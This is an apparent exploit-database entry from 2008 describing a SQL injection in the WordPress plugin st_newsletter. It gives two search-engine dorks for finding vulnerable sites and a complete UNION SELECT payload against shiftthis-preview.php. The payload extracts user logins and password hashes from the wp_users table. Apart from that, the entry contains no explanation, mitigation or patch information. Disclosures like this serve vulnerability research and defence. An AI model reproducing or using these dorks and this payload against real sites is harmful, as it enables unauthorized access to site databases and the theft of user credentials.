id: 2593
date: 02/03/2008
title: Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability
=================================================================



#########################################################################
#
#  Wordpress Plugin (st_newsletter) SQL Injection
#
#
#########################################################################
#
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
#
# DORK 2 : allinurl :"shiftthis-preview.php"
#
##########################################################################
EXPLOIT :

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users







#  0day.today [2023-03-22]  #